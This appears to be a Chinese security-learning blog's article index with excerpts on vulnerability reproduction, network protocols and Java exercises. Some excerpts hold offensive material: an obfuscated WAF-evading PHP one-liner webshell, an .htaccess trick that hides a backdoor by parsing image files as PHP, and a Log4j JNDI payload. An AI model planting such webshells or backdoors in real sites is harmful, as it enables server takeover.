qq_41814777的博客

原创 Log4j漏洞复现

漏洞描述Apache Log4j2是一款Java日志框架。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。在打印日志的时候，如果你的日志内容中包含关键词 ${}，攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令，并且执行Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。当log4j打印的日志内容中包括 ${jndi:ldap://ip}时，程序就会通过Id

原创 shiro反序列化漏洞原理和复现

shiro反序列化复现

原创 74cms v6.0.48模版注入+文件包含getshell复现

漏洞描述74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码影响版本骑士 CMS < 6.0.48风险等级高漏洞环境搭建74 cms: 74cms_Home_Setup_v6.0.20.zip系统：ubuntu18.04.5php环境：php 5.6系统镜像：http://old-releases.ubuntu.com/releases/web源码下载：https://www.74cms.com/download/index.html准备好后直接把源码放到var/

原创 BLP模型

BLP模型的两个特性简单安全特性：主读客，主安全级别>=客安全级别；主的范畴集合包含客的范畴集合，主只向下读*特性：主写客，主密=<客密；客的范畴集合包含主的范畴集合，主只向上写...

原创 nmap的扫描类型

端口扫描技术-sSTCP SYN扫描，半开放扫描，需要root权限-sTTCP Connect扫描，用户没有权限发送原始报文或扫描IPv6时，Nmap默认使用该扫描方式。Nmap调用connect()对目标端口建立连接，这种方式会花费更长的时间、会在目标机留下连接记录。-sUUDP扫描，可以和TCP扫描同时使用检查两种协议。扫描比较慢，Linux 2.4.20内核限制一秒钟只发送一条目标不可到达消息。加速UDP扫描，可以并发扫描更多的主机，先只对主要端口进行快速扫描，从防火墙后面扫描，使用–.

原创 sqlmap之tamper的使用介绍

sqlmap中tamper的简介 - 御用闲人 - 博客园sqlmap中tamper的简介 - 御用闲人 - 博客园就是它

转载 Tomcat的四大xml配置文件介绍

四个XML配置文件及其作用分别是content.xml、server.xml、web.xml、tomcat-users.xmltomcat-users.xml：关于用户登录、管理员账号密码的配置都在这个文件中。默认情况下用户登录的账号密码是注释掉的，只有去掉注释才可以登录成功，也就是大家熟知的"tomcat管理台弱口令部署war包getshell"<role rolename="tomcat"/><role rolename="role1"/><user use

原创 htaccess文件的使用小技巧

0x00维持权限隐藏后门一般我们上传的木马都是脚本文件，管理员进行定期检查的时候容易发现，但是可以通过配置htaccess，让后缀为jpg、png、jpeg、gif等文件以脚本文件解析，配置如下:<FilesMatch "jpg"> 　　SetHandler application/x-httpd-php </FilesMatch>0x01限制对敏感文件和后台的访问在日常网站维护中，很容易输入/login.php /login.html /admin.jsp 等目录

原创 几种批处理病毒的原理和实验

批处理病毒介绍：批处理病毒是一种DOS命令的病毒，实质就是一些命令的组合，具有代码量小，技术门槛低，而危害性大的特点，所以很值得来学习，做一个初步的了解，方便同事以后在客户现场做病毒演示。以下病毒按作用效果分为了蓝屏、循环和破坏，它们三者之间也可以两两进行代码命令组合。注：以下实验都在虚拟机中实验，并前期做好快照，真机实验后果自负蓝屏篇：工具：ntsd是一个用户态进程调试工具，从Windows 2000就开始被附随在System32目录下。它能够结束除System、smss.exe、csrss.

原创 前端javascript中Location的使用

标题location的常用方法；location.search.slice(1) // 取url中?之后的部分location.hash.substring(1) //取url中#之后的部分通过javascript跳转：location.href()location.assign()location.replace()

原创 Kerberos认证介绍及黄金票据和白银票据

学前介绍LM协议： 早期SMB协议在网络上传输明文口令。后来出现LAN Manager 挑战和响应 验证机制简称LM，很简单，容易被破解NTLM： 微软提出的一种windowsNT挑战/响应验证机制，称之为NTLM。现在已经有了更新到了NTLMv2和kerberos验证机制NTML的挑战和响应机制如下：（就跟短信验证码一样）协商：客户端向服务端确认协议的版本质询：客户端向服务端发送用户信息请求；服务器接收之后生成一个16位随机数，称之为Challenge；用NTML HASH加密16位随机数，

原创 Vmware converter standalone 出现 permission to perform this operation was deny

背景：由于换了新电脑，所以想着把老机子做成虚拟机，好在新电脑里能够直接用！然而意想不到的问题发生了，在我第二次转化的时候新窗口出现了报错：permission to perform this operation was deny 如图所示：由于网上的教程都没有我的这么好使且中文版很少，所以出此解决教程解决方法：把Vmware converter standalone以管理员权限打开就好（真的就这么简单）详细：右键——>选择管理员权限...

原创 评价一款CPU、内存性能的指标

CPU主要的性能指标1、 主频：是CPU的工作频率，单位时钟内它能完成的指令数。通常情况下，主频越高，CPU速度越快。2、 外频：是CPU和主板之间同步运行的速度，CPU的外频影响整块主板的运行速度，也就是说外频越高，CPU就可以同时接受更多来自外围设备的数据。3、 制程：是CPU的制作工艺，制程越小发热量越小，这样在单位面积内就可以集成更多的晶体管。...

原创 某司笔试题

一、简答题1、TCP协议中的FIN和RST标志位代表什么意思？FIN是终止位，用来在传输数据完毕后释放连接。RST表示复位，用来异常的关闭连接2、网络接口规范中，FE，GE、SFP、SFP+，XFP的含义FE:是百兆以太网（Fast Ethernet）GE:是千兆以太网（Gigabit Ethernet）SFP:最高工作速率4G，和SFP+外观相同（SFP模块是小型化的GBIC，体积比GBIC模块少一半，功能和GBIC相同）SFP+:工作速率是10G，可以满足以太网10G的应用XFP:10

原创 各种语言中httponly属性的添加

httponly是一个防止JS盗取cookie的安全属性，在抵抗XSS攻击中起到了至关重要的作用！那么如何通过代码来为没有httponly属性的添加呢？JAVA添加httponly属性:对于javaee4、javaee5来说的话，是没有httponly这个属性的，就需要自己手动添加。import javax.servlet.http.Cookie;import javax.servlet.http.HttpServletResponse;public class CookieUtil {

原创 某笔试题linux运维命令

XXE漏洞介绍：全称是XML外部实体注入漏洞，发生在web解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描等。前端提交的数据可以影响后端。XXE漏洞代码：XXE漏洞介绍：XXE漏洞介绍：XXE防御：libxml_disable_entity_loader(true);禁用外部实体加载...

原创 各种日志目录及介绍

linux系统日志目录(ubuntu为例)：/var/log/var/log/alternatives.log-更新替代信息都记录在这个文件中/var/log/apport.log -应用程序崩溃记录/var/log/apt/ -用apt-get安装卸载软件的信息/var/log/auth.log -登录认证log/var/log/boot.log -包含系统启动时的日志。/var/log/btmp -记录所有失败启动信息/var/log/Consolekit - 记

原创 SSRF和XXE漏洞介绍

前沿：介绍一个开源的渗透测试平台vulhub笔记：webLogic 从SSRF到redis未授权访问到getshell（不需要用户名和密码访问redis数据库，读写文件）SSRF介绍：SSRF(Server-Side Request Forgery)，服务器端请求伪造，利用漏洞伪造服务器端发起请求，从而突破客户端访问不到的数据。通常是这样的：客户端请求一个正常的url资源，服务端新建一个文本文件把资源内容写入到该文本，然后保存，最后读取再输出。SSRF漏洞危害：访问服务端敏感文件，造成数据泄露

原创 RSA加解密和签名图形界面化

```javapackage shiyan;/** *下面我们开始导包 ， 土话 就是 把 那个文件夹下的 什么东西 拿来 ，我要用， *java是重量级的包，javax是轻量级的包！！ * */import org.apache.commons.codec.binary.Base64;//Commons项目中用来处理常用的编码方法的工具类包，例如DES、SHA1、MD5、Base64, 及 hex, metaphone, soundex 等编码演算。import org.apache.c.

原创 OSPF学习总结

对于OSPF的学习重点总结： 一个DR，三个表，五种包，七种状态，路径寻优，实时更新！OSPF介绍： 一种链路状态和内部网关协议，所谓链路状态就是指：链路上的路由器与哪些路由器相邻以及它们之间的距离（度量值）是多少，来确定一条最短路径。内部网关则指的是：一个自治系统内的网关之间交换路由信息的协议。一个DR：DR是根据一定的规则选出来的指定路由器，还有一个是备份指定路由器BDR（即备胎）！在一个OSPF网络中，所有的路由器只分为：指定路由器（DR/BDR）和非指定路由器（DROTHER）！ 作用：和所

原创 一个批处理命令的关机小程序

原创 网鼎杯2020-Crypto(you raise me up)基于离散对数求解问题

#!/usr/bin/env python# -*- coding: utf-8 -*-from Crypto.Util.number import *import randomn = 2 ** 512m = random.randint(2, n-1) | 1c = pow(m, bytes_to_long(flag), n)print 'm = ' + str(m)print 'c = ' + str(c)# m = 39119070912452742895948966256527

原创 云计算、大数据、5G、人工智能和工业互联网介绍和联系

2020年，新基建的再次提出为中国的产业结构升级和转型提供了新动力，它涉及到了信息网、能源网和交通网三大板块，涵盖了5G基建、人工智能、大数据中心、工业互联网、特高压、城际高速铁路和轨道交通特高压和新能源汽车充电桩等七大领域！作为新基建的几个发力点同时又作为优化中国产业结构的重点：5G基建、AI、大数据中心和工业互联网尤为重中之重！

原创 MYSQL数据库和金仓数据库，错误1067进程意外终止怎么办？？

对于这个错误1067进程意外终止的问题困扰了我好久，不仅在mysql 上遇到过，还在金仓数据库（国产数据库）上也遇到过，根据自己的经验写篇博客，希望能到大家！

转载 信息搜集-炒鸡详细（这么好的文章一定要让大家也能看见！）

项目在这，不知道他会不会删除收集域名信息 myip.ms TCPIPUTILS DNSlytics 在线网站 Dnslytics Whois 查询 备案信息查询 信用信息查询 IP反查站点的站 浏览器插件收集相关应用信息 七麦数据 AppStore 天眼查 ...

原创 2. 设计一个用户登录程序，界面包含：用户名，密码，密码确认 三个文本框，和 登录、取消 两个按钮。用户点击登录按钮后，首先判断两个密码输入是否一致，如果不一致弹出提示信息，让用户再次输入；否则判断用

设计一个用户登录程序，界面包含：用户名，密码，密码确认 三个文本框，和 登录、取消 两个按钮。用户点击登录按钮后，首先判断两个密码输入是否一致，如果不一致弹出提示信息，让用户再次输入；否则判断用户名是否为“Admin”，密码是否为“123”，如果是提示登录成功，否则提示用户名或密码错误。package java4;import java.awt.*;import java.awt.ev...

原创 java 、在第一题的基础上，生成10个员工对象，创建2个线程，第一个线程将所有的2018年9月1日之前入职的男雇员信息写入到“D：\male.txt”文件中；第二个线程将所有女雇员信息写入到“D：

3、在第一题的基础上，生成10个员工对象，创建2个线程，第一个线程将所有的2018年9月1日之前入职的男雇员信息写入到“D：\male.txt”文件中；第二个线程将所有女雇员信息写入到“D：\female.txt”文件中。4、在第三题的基础上，创建新目录“E:\employee”,然后将“D:\male.txt”和“D:\female.txt”按序拷贝到“E:\employee\employee...

原创 错误代码java

package java3;import java.io.*;class Thread1 extends Thread{ private String ID; public static final String dizhi= "D:\\male.txt"; public Thread1(String ID) { this.ID=ID; } public ...

原创 *生成10个员工对象，存储到ArrayList中，找出所有在2018年1月1号之前入职的员工，并显示；将所有2019年1月1日之后入职的员工删除。

2、在第一题的基础上，生成10个员工对象，存储到ArrayList中，找出所有在2018年1月1号之前入职的员工，并显示；将所有2019年1月1日之后入职的员工删除。package java3;import java.io.*;import java.util.*;public class Employee { public String name; public String ...

原创 定义一个雇员类Employee，包括属性：姓名，工号，年龄，工资。

1、定义一个雇员类Employee，包括属性：姓名，工号，年龄，工资。要求：工号的构成方式：（入职年月份）-（性别）-（3位随机序列码），其中入职年月份格式为yyyyMMdd；性别(枚举)为男记录00，性别为女记录01；随机号码长3，且不能全0或全1.提供方法实现：1）从工号提取入职日期(Date)，提取性别，提取随机序列码2）根据输入的入职日期(Date)、性别，生成随机序列码，组成工号。...

原创 java图形界面化之一个静态的登录页面

package javagui;import java.awt.*;import javax.swing.*;public class login { public static void main(String args[]) { //JFrame的实例化并用其子类的方法 new login_test().init("login"); System.out.printl...

原创 java图形界面化之菜单

package javagui;import java.awt.*;import javax.swing.*;public class login { public static void main(String args[]) { //JFrame的实例化并用其子类的方法 new MyFrame().init("菜单测试"); System.out.println("he...

原创 bwapp数据库创建四个其所需的表

上次在搭建bwapp的时候，发现那个/bwapp/db/bwapp.sqlite是一个sqlserver 的文件无法直接导入到mysql中，所以自己写了和其相同的四个表，差别不大，能用。blog表 create table blog (id int(10) NOT NULL , owner varchar(100) DEFAULT NULL, entry varchar(500)...

原创 CTF之web考点分析360杯学习总结（抄袭）

主要分为前端语言和后端语言前端语言html和css一般不会单独作为考点，但是依然要掌握快速读懂他们的技巧。JavaScript考点: 目前前端的考点主要出现在JS上。信息获取: Js加解密，XSS攻击，CSP防御机制绕过，CSRF等。权限获取: Node]s代码审计，前端VUE， 跨域关于每个方向的主要解题方法:JS加解密解题主要靠积累， 对于IJENCODE、AAENCODE等方...

原创 简单的内存取证介绍

定义： 通常指对计算机及相关智能设备运行时的物理内存中存储的临时数据进行获取与分析，提取有价值的数据。 内存是操作系统及各种软件交换数据的区域，数据易丢失(Volatile)，通常在关机后数据很快就消失。（是指利用将内存进程写入镜像文件，通过镜像文件查看之前内存进程的一些信息。）工具介绍：volatilityvolatility是一款开源的内存取证分析工具，由python编写，支持各种操作系统...

原创 Integer类中的parseInt方法

基本数据类型包装类用在基本数据与字符串之间进行转换parseInt(String s, int radix)方法中 radix是将s指定为多少进制数，而parseint方法 转换结果 为十进制数package test;import java.util.Scanner;public class FormatExceptionDemo { public static void ma...

原创 java设计实现三角形类，该类继承图形抽象类，并实现面积接口和周长接口，计算三角形面积和周长

要求：5-1. 创建一个java抽象类，类名：Figure。5-2. 创建一个java接口，接口名：Area，并定义成员方法名为area。5-3. 创建一个java接口，接口名：Perimeter，并定义成员方法名为perimeter。5-4. 创建java类，类名：Triangle，该类继承自类Figure，并实现接口Area和Perimeter。5-5. 在Triangle类中添加m...

原创 java实现多态在工资系统中的应用：给出一个根据雇员类型，利用多态性完成工资单计算的程序。

Employee是抽象类，Employee的子类有Boss（每星期发给他固定工资，而不计工作时间）、CommissionWorker（除基本工资外还根据销售额发放浮动工资）、PieceWorker（按其生产的产品数发放工资）、HourlyWorker（根据工作时间长短发放工资）。该例的Employee的每个子类都声明为final，因为不需要再继承它们生成子类。在主测试类Test中测试各类雇员工资计算结果。

原创 常用的正则表达式符号和释义

符号释义^表字符串的开始位置，要匹配 ^ 字符本身，请使用 \^$字符串结束位置\d表示[0-9]任意数字\w表示任意字母和下划线\w+表示多次出现字母或下划线\.表示小数点\d+表示多次（1次和1次以上）数字*匹配前面的子表达式零次或多次\s表示空白字符( )标记一个子表达式的开始和结束位置。|...

原创 过狗的一句话

php过狗一句话：waf通常以关键字来判断是否是一句话木马。<?php $test="e#v#a#l"; $test1=explode("#",$test); $test2=$test1[0].$test1[1].$test1[2].$test1[3]; $test2($_POST['zt']);?>这是eval函数的一句话的写法<?...